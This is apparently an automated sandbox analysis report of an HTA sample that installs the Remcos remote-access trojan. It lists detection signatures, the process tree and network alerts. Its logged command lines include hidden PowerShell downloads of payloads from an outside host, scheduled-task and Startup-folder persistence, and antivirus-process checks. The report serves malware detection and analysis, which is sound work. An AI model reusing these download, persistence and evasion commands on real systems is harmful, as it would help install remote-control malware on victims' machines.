
Windows Analysis Report
c2.hta

Overview

General Information

Sample name: c2.hta
Analysis ID: 1585493
MD5: 3a4f0963b57121e55af053325ea89240
SHA1: 989889d50c78bff05ec5ed3e069bf72e58889c35
SHA256: 41d88bc4022af4df4b7be44f3de7ff07e5619b2116400eb57460367b85958684
Tags: hta, user-abuse_ch

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected Remcos RAT
Sigma detected: Drops script at startup location
Sigma detected: Remcos
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found API chain indicative of sandbox detection
Installs a global keyboard hook
Loading BitLocker PowerShell Module
Powershell drops PE file
Sigma detected: Legitimate Application Dropped Script
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious powershell command line found
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript called in batch mode (suppress errors)
Contains functionality to read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • mshta.exe (PID: 6164 cmdline: mshta.exe "C:\Users\user\Desktop\c2.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • cmd.exe (PID: 1148 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7196 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • Acrobat.exe (PID: 7404 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\W2.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 7684 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7840 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2044 --field-trial-handle=1728,i,16385498434607258670,18278990784431365219,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • powershell.exe (PID: 7420 cmdline: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • powershell.exe (PID: 8572 cmdline: powershell -WindowStyle Hidden -Command "Expand-Archive -Path C:\Users\user\AppData\Local\Temp\msword.zip -DestinationPath C:\Users\user\AppData\Local\Temp\msword -Force" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • msword.exe (PID: 8720 cmdline: msword.exe MD5: 5BF20E8953B3219CD4F60BE10A73509F)
        • cmd.exe (PID: 8908 cmdline: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 8920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 8980 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 8996 cmdline: findstr /I "opssvc wrsa" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • tasklist.exe (PID: 9024 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
          • findstr.exe (PID: 9032 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 9136 cmdline: cmd /c md 361684 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • extrac32.exe (PID: 9152 cmdline: extrac32 /Y /E Approaches MD5: 9472AAB6390E4F1431BAA912FCFF9707)
          • findstr.exe (PID: 9168 cmdline: findstr /V "Korea" Measurement MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
          • cmd.exe (PID: 9184 cmdline: cmd /c copy /b 361684\Propose.com + Different + Constitute + Instantly + Led + Indonesia + Dressing + Missed + Brian + Clinton + Protocol 361684\Propose.com MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • cmd.exe (PID: 9200 cmdline: cmd /c copy /b ..\Next + ..\Math + ..\Blocked + ..\Leisure + ..\Substantial + ..\Beam + ..\Cocks + ..\David + ..\Undefined + ..\Realm U MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • Propose.com (PID: 5752 cmdline: Propose.com U MD5: 62D09F076E6E0240548C2F837536A46A)
            • cmd.exe (PID: 7220 cmdline: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7204 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 648 cmdline: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
            • cmd.exe (PID: 7552 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & echo URL="C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • choice.exe (PID: 600 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
    • cmd.exe (PID: 8748 cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\cleanup.bat" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 8808 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • wscript.exe (PID: 8388 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 8500 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • wscript.exe (PID: 6064 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • LinkHub.com (PID: 8556 cmdline: "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com" "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\y" MD5: 62D09F076E6E0240548C2F837536A46A)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
No configs have been found
Source | Rule | Description | Author | Strings
C:\ProgramData\remcos\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security |

    System Summary

    Source: File created | Author: frack113, Florian Roth (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 6164, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\0o8vth[1].bat
    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7220, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 648, ProcessName: schtasks.exe
    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7420, ProcessName: powershell.exe
    Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\c2.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6164, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ProcessId: 1148, ProcessName: cmd.exe
    Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/msword.zip -OutFile C:\Users\user\AppData\Local\Temp\msword.zip", ProcessId: 7420, ProcessName: powershell.exe
    Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 8388, ProcessName: wscript.exe
    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7196, ProcessName: powershell.exe
    Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7220, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Murray" /tr "wscript //B 'C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js'" /sc minute /mo 5 /F, ProcessId: 648, ProcessName: schtasks.exe
    Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7196, ProcessName: powershell.exe
    Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.js", ProcessId: 8388, ProcessName: wscript.exe
    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\temp.bat", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1148, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Invoke-WebRequest -Uri https://myguyapp.com/W2.pdf -OutFile C:\Users\user\Downloads\W2.pdf", ProcessId: 7196, ProcessName: powershell.exe

    Data Obfuscation

    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7552, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LinkHub.url

    HIPS / PFW / Operating System Protection Evasion

    Source: Process started | Author: Joe Security | Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c move Nr Nr.cmd & Nr.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8908, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 9032, ProcessName: findstr.exe

    Stealing of Sensitive Information

    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com, ProcessId: 5752, TargetFilename: C:\ProgramData\remcos\logs.dat

    Suricata IDS alerts (one table per signature group in the original report):

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-01-07T18:13:55.311475+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49756 | 193.26.115.39 | 7009 | TCP

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-01-07T18:13:56.432073+0100 | 2803304 | 3 | Unknown Traffic | 192.168.2.4 | 49758 | 178.237.33.50 | 80 | TCP

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-01-07T18:12:57.345392+0100 | 2827578 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 108.181.20.35 | 443 | TCP

    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
    2025-01-07T18:13:00.400496+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 193.26.115.39 | 443 | TCP
    2025-01-07T18:13:04.344206+0100 | 1810000 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49738 | 193.26.115.39 | 443 | TCP


    AV Detection

    Source: https://myguyapp.com/msword.zip | Avira URL Cloud: Label: malware
    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 96.8% probability
    Source: unknown | HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.4:49731 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49735 version: TLS 1.2
    Source: unknown | HTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_004062D5 FindFirstFileW,FindClose,13_2_004062D5
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_00402E18 FindFirstFileW,13_2_00402E18
    Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 13_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,13_2_00406C9B
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEA087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA087
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEA1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,38_2_00CEA1E2
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDE472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,38_2_00CDE472
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CEA570 FindFirstFileW,Sleep,FindNextFileW,FindClose,38_2_00CEA570
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE66DC FindFirstFileW,FindNextFileW,FindClose,38_2_00CE66DC
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CAC622 FindFirstFileExW,38_2_00CAC622
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE73D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,38_2_00CE73D4
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CE7333 FindFirstFileW,FindClose,38_2_00CE7333
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDD921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDD921
    Source: C:\Users\user\AppData\Local\ConnectWare Technologies Ltd\LinkHub.com | Code function: 38_2_00CDDC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,38_2_00CDDC54
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword\
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
    Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\

    Networking

    Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49756 -> 193.26.115.39:7009
    Source: Network traffic | Suricata IDS: 2827578 - Severity 1 - ETPRO MALWARE Likely Dropper Doc GET to .moe TLD : 192.168.2.4:49731 -> 108.181.20.35:443
    Source: global traffic | TCP traffic: 192.168.2.4:49756 -> 193.26.115.39:7009
    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1
        Host: geoplugin.net
        Cache-Control: no-cache
    Source: Joe Sandbox View | IP Address: 108.181.20.35 108.181.20.35
    Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
    Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49758 -> 178.237.33.50:80
    Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49735 -> 193.26.115.39:443
    Source: Network traffic | Suricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49738 -> 193.26.115.39:443
    Source: global traffic | HTTP traffic detected: GET /0o8vth.bat HTTP/1.1
        Accept: */*
        Accept-Language: en-CH
        Accept-Encoding: gzip, deflate
        User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
        Host: files.catbox.moe
        Connection: Keep-Alive
